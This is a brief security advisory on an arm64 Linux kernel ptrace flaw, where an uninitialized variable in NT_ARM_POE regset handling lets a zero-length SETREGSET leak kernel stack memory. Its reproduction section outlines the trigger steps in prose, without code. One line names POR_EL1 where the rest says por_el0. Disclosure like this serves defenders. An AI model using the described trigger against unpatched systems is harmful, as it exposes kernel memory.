Linux Kernel Ptrace Vulnerability in NT_ARM_POE Regset Handling

A vulnerability in the Linux kernel's ptrace implementation for arm64 architecture has been addressed. The issue arose in the NT_ARM_POE regset handling, where a temporary variable was not properly initialized. This oversight allowed a SETREGSET call with a zero length to write an uninitialized value back to the target's thread.por_el0, potentially leaking up to 64 bits of memory from the kernel stack. The vulnerability was limited to reading a specific slot on the stack without providing a mechanism to write back. The issue has been fixed by ensuring the temporary variable is initialized before copying the regset from userspace, similar to the handling of other regsets. As a result, a zero-length write now retains the existing contents of POR_EL1.

Impact

The vulnerability could lead to unintentional leakage of kernel stack memory to userspace, exposing sensitive information.

Reproduction

The vulnerability can be reproduced by writing a specific value to the NT_ARM_POE::por_el0 register using the SETREGSET command. After confirming the write operation, a zero-length SETREGSET command can be issued, which will inadvertently read an uninitialized value from the kernel stack and return it through the NT_ARM_POE::por_el0 register.

Remediation

Users should upgrade to the latest version of the Linux kernel where this vulnerability has been addressed.